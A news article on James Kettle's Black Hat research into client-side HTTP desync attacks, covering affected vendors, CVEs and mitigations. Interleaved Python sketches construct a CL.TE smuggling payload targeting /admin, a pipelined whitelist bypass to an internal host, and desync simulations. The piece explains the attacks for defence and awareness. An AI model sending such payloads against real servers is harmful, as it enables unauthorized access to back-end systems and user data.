BLACK HAT USA – LAS VEGAS – A security researcher who previously demonstrated how attackers can exploit weaknesses in how websites handle HTTP requests has warned that the same issues can be weaponized for damaging browser-based attacks against users.
James Kettle, director of research at PortSwigger, described his research as shedding new light on so-called desynchronization attacks, which exploit mismatches in how a website’s back-end and front-end servers interpret HTTP requests. Previously, at Black Hat USA 2019, Kettle showed how attackers could trigger these disagreements – over things like message length, for example – to route HTTP requests to a back-end component of their choosing, steal user information, invoke unexpected responses from an application, and take other malicious actions. Kettle has also previously shown how HTTP/2 implementation errors can put websites at risk of compromise.
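As a hedged illustration of the message-length disagreement behind those earlier server-side attacks (the host and paths below are hypothetical, not targets from Kettle's research), the sketch builds a classic CL.TE-style payload: a front-end that trusts Content-Length treats it as one request, while a back-end that trusts Transfer-Encoding sees the chunked body end early and interprets the trailing bytes as the start of a second, smuggled request:

```python
# Sketch of a CL.TE request-smuggling payload (hypothetical host and paths).
# A front-end trusting Content-Length forwards everything as ONE request;
# a back-end trusting Transfer-Encoding sees the chunked body end at
# "0\r\n\r\n" and treats the remaining bytes as the NEXT request's prefix.
smuggled_prefix = b"GET /admin HTTP/1.1\r\nX: "
body = b"0\r\n\r\n" + smuggled_prefix

payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
) + body
```

The trailing `X: ` header-name fragment means the next request arriving on that back-end connection is absorbed into the smuggled request, so it is handled as a request for `/admin` instead.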
Kettle’s new research focuses on how threat actors can exploit the same improper HTTP request processing to attack website users as well, stealing credentials, installing backdoors, and compromising their systems in other ways. Kettle said he has identified HTTP handling anomalies that allow such client-side desynchronization attacks on sites such as Amazon.com and those using the AWS Application Load Balancer, Cisco ASA WebVPN, Akamai, Varnish Cache servers, and Apache HTTP Server 2.4.52 and earlier.
The main difference between server-side desynchronization attacks and client-side desynchronization attacks is that the former requires a target site fronted by a reverse proxy and at least partially malformed requests, Kettle said in a conversation with Dark Reading after his presentation. A browser-powered attack, by contrast, takes place inside the victim’s web browser, using legitimate requests, he said. As an example of what an attacker could do, Kettle showed a proof of concept in which he was able to store information such as random users’ authentication tokens on Amazon in his shopping list. Kettle found that he could have made every infected victim on Amazon’s site relaunch the attack against others.
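The mechanic that makes those legitimate browser requests dangerous can be modeled with a toy parser (the paths and the `buggy_read_request` helper below are illustrative inventions, not code from the research): if a server answers a POST without consuming its declared body, the body bytes remain in the connection buffer and are parsed as the beginning of the browser's next request on that reused connection.

```python
# Toy simulation of a client-side desync. The "server" reads only the
# header block and (buggily) ignores Content-Length, so the POST body is
# left over and gets interpreted as the start of the NEXT request.

def buggy_read_request(buffer: bytes):
    """Split off the header block, leaving the unread body behind (the bug)."""
    head, _, rest = buffer.partition(b"\r\n\r\n")
    return head, rest

# A legitimate-looking POST the victim's browser sends; its
# attacker-controlled body smuggles a request prefix.
poisoned = (
    b"POST /api HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 39\r\n"
    b"\r\n"
    b"GET /attacker-controlled HTTP/1.1\r\nX: Y"
)
victim_next = b"GET /account HTTP/1.1\r\nHost: vulnerable.example\r\n\r\n"

_, leftover = buggy_read_request(poisoned)
# The victim's follow-up request is appended to the smuggled prefix, so
# the server now serves the attacker's path to the victim's browser.
desynced_stream = leftover + victim_next
```

In a real attack the poisoned POST is triggered cross-origin by attacker JavaScript, and the hijacked follow-up response is what lets the attacker redirect the victim or capture their request.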
“This would have released a desync worm – a self-replicating attack that exploits victims to infect others without user interaction, rapidly exploiting every active user on Amazon,” Kettle said. Amazon has since fixed the issue.
Cisco assigned a CVE to the vulnerability (CVE-2022-20713) after Kettle notified the company, and described the issue as allowing an unauthenticated remote attacker to conduct browser-based attacks against website users. “An attacker could exploit this vulnerability by convincing a targeted user to visit a website capable of transmitting malicious requests to an ASA device that has the Clientless SSL VPN feature enabled,” the company noted. “A successful exploit could allow the attacker to conduct browser-based attacks, including cross-site scripting attacks, against the targeted user.”
Apache described its HTTP request smuggling vulnerability (CVE-2022-22720) as stemming from a failure “to close the incoming connection when errors are encountered while discarding the request body.” Varnish described its vulnerability (CVE-2022-23959) as allowing attackers to inject fake responses on client connections.
In a white paper released today, Kettle said there are two distinct scenarios in which HTTP processing anomalies could have security implications.
The first is first-request validation. Front-end servers that handle HTTP requests use the Host header to identify which back-end to route each request to, and these proxy servers often maintain a whitelist of hosts that users are allowed to access. What Kettle discovered is that some front-end or proxy servers apply the whitelist only to the first request sent over a connection, not to subsequent requests sent over the same connection. Attackers can abuse this to reach a forbidden component by first sending a request to an authorized destination and then sending a request for their real target over the same connection.
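Under stated assumptions (hypothetical hostnames, and a proxy that checks its Host whitelist only once per connection), the bypass amounts to pipelining two requests down a single connection:

```python
# Sketch of a first-request-validation bypass (hypothetical hosts).
# Some proxies validate the Host header against their whitelist only for
# the FIRST request on a connection; a second, pipelined request can then
# name an internal host and sail through unchecked.
allowed_first = (
    b"GET / HTTP/1.1\r\n"
    b"Host: public.example\r\n"      # passes the whitelist check
    b"\r\n"
)
smuggled_second = (
    b"GET /secrets HTTP/1.1\r\n"
    b"Host: intranet.internal\r\n"   # never re-checked on the reused connection
    b"\r\n"
)
pipelined = allowed_first + smuggled_second
```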
Another closely related but much more common problem Kettle encountered stems from first-request routing. With first-request routing, the front-end or proxy server examines the Host header of the first HTTP request to decide where to route it, and then routes all subsequent requests from that client connection to the same back-end server. In environments where the Host header is handled insecurely, this gives attackers the ability to target any back-end component and carry out various attacks, Kettle said.
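The routing behavior can be modeled with a toy connection handler (backend addresses and hostnames below are invented for illustration): the back-end is chosen once, from the first request's Host header, and every later request on the connection inherits that choice regardless of its own Host header.

```python
# Toy model of first-request routing (hypothetical hosts and addresses).
# The proxy picks a back-end from the FIRST request's Host header and pins
# the connection to it; later requests follow, whatever Host they carry.
BACKENDS = {"public.example": "10.0.0.5", "intranet.internal": "10.0.9.9"}

class Connection:
    def __init__(self):
        self.pinned_backend = None

    def route(self, host: str) -> str:
        if self.pinned_backend is None:           # only the first request
            self.pinned_backend = BACKENDS[host]  # decides the routing
        return self.pinned_backend

conn = Connection()
first = conn.route("intranet.internal")  # attacker names the target up front
second = conn.route("public.example")    # still lands on the internal host
```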
The best way for websites to mitigate client-side desynchronization attacks is to use end-to-end HTTP/2, Kettle said. It’s generally not a good idea to have a front-end that supports HTTP/2 and a back-end that is HTTP/1.1. “If your company routes employee traffic through a forward proxy, make sure upstream HTTP/2 is supported and enabled,” Kettle advised. “Please note that the use of forward proxies also introduces a range of additional request smuggling risks beyond the scope of this article.”
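For an Apache httpd deployment, one way that end-to-end HTTP/2 advice can look is the fragment below, which uses mod_proxy_http2 to speak HTTP/2 upstream (the backend hostname is hypothetical; this is a sketch, and operators should verify the directives against their own proxy's documentation):

```apacheconf
# Sketch: end-to-end HTTP/2 in Apache httpd (hypothetical backend host).
# Requires mod_proxy and mod_proxy_http2 to be loaded.
Protocols h2 http/1.1

# The h2:// scheme tells mod_proxy_http2 to use HTTP/2 to the back-end,
# avoiding a downgrade to ambiguity-prone HTTP/1.1 framing.
ProxyPass        "/app/" "h2://backend.internal.example/"
ProxyPassReverse "/app/" "h2://backend.internal.example/"
```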